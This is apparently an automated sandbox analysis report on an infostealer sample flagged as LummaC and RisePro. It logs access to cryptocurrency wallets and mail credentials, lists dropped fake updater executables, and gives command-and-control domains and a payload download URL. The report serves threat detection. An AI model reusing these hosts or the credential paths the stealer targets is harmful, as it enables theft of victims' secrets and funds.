Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN

Source: Yara match	File source: 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	411 Process Injection	2 Obfuscated Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	261 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	12 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	411 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tMO4FVIc9l.exe	42%	ReversingLabs
tMO4FVIc9l.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	100%	Avira	HEUR/AGEN.1317026
C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	45%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	45%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	45%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	45%	ReversingLabs	Win32.Trojan.Zusy

Source	Detection	Scanner	Label
https://db-ip.com/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ipinfo.io/Mozilla/5.0	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	URL Reputation	safe
https://t.me/risepro_botD	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/pi	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDll	0%	URL Reputation	safe
https://employhabragaomlsp.shop/apiY	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/apih	0%	Avira URL Cloud	safe
http://5.42.65.116/lumma2305.exej	100%	Avira URL Cloud	phishing
http://5.42.65.116/lumma2305.exe~	100%	Avira URL Cloud	phishing
http://5.42.65.116/lumma2305.exeMeleonCH	100%	Avira URL Cloud	phishing
https://support.mozilla.org	0%	URL Reputation	safe
https://employhabragaomlsp.shop:443/api	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://employhabragaomlsp.shop/l	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/aibcnf	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/i	0%	Avira URL Cloud	safe
averageaattractiionsl.shop	0%	Avira URL Cloud	safe
https://db-ip.com/demo/home.php?s=8.46.123.175	0%	Avira URL Cloud	safe
buttockdecarderwiso.shop	0%	Avira URL Cloud	safe
http://5.42.65.116/lumma2305.exeaTTm	100%	Avira URL Cloud	phishing
https://ipinfo.io/Y	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/s	0%	Avira URL Cloud	safe
employhabragaomlsp.shop	0%	Avira URL Cloud	safe
http://5.42.65.116/lumma2305.exeEWPz	100%	Avira URL Cloud	phishing
http://5.42.65.116/lumma2305.exe	100%	Avira URL Cloud	phishing
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
roomabolishsnifftwk.shop	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop:443/apihrome	0%	Avira URL Cloud	safe
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://5.42.65.116/lumma2305.exeto.de	100%	Avira URL Cloud	phishing
https://employhabragaomlsp.shop/api(	0%	Avira URL Cloud	safe
https://t.me/risepro_bot	0%	Avira URL Cloud	safe
https://db-ip.com:443/demo/home.php?s=8.46.123.175	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/api	0%	Avira URL Cloud	safe
femininiespywageg.shop	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/apiO	0%	Avira URL Cloud	safe
https://ipinfo.io:443/widget/demo/8.46.123.175F	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/apiP	0%	Avira URL Cloud	safe
https://ipinfo.io/widget/demo/8.46.123.175	0%	Avira URL Cloud	safe
civilianurinedtsraov.shop	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/8	0%	Avira URL Cloud	safe
museumtespaceorsp.shop	0%	Avira URL Cloud	safe
https://employhabragaomlsp.shop/	0%	Avira URL Cloud	safe
stalfbaclcalorieeis.shop	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
employhabragaomlsp.shop	188.114.96.3	true	true	unknown
ipinfo.io	34.117.186.192	true	false	unknown
db-ip.com	104.26.5.15	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
averageaattractiionsl.shop	true	Avira URL Cloud: safe	unknown
https://db-ip.com/demo/home.php?s=8.46.123.175	false	Avira URL Cloud: safe	unknown
buttockdecarderwiso.shop	true	Avira URL Cloud: safe	unknown
employhabragaomlsp.shop	true	Avira URL Cloud: safe	unknown
http://5.42.65.116/lumma2305.exe	true	Avira URL Cloud: phishing	unknown
roomabolishsnifftwk.shop	true	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/api	true	Avira URL Cloud: safe	unknown
femininiespywageg.shop	true	Avira URL Cloud: safe	unknown
https://ipinfo.io/widget/demo/8.46.123.175	false	Avira URL Cloud: safe	unknown
civilianurinedtsraov.shop	true	Avira URL Cloud: safe	unknown
museumtespaceorsp.shop	true	Avira URL Cloud: safe	unknown
stalfbaclcalorieeis.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	Avira URL Cloud: safe	unknown
http://5.42.65.116/lumma2305.exeMeleonCH	tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://5.42.65.116/lumma2305.exej	tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://duckduckgo.com/ac/?q=	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop:443/api	RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/risepro_botD	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://5.42.65.116/lumma2305.exe~	tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	URL Reputation: safe	unknown
https://employhabragaomlsp.shop/apih	RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/apiY	RegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/pi	RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/aibcnf	RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/l	RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/i	RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	URL Reputation: safe	unknown
https://employhabragaomlsp.shop/s	RegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.42.65.116/lumma2305.exeaTTm	tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ipinfo.io/Y	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://5.42.65.116/lumma2305.exeEWPz	tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop:443/apihrome	RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
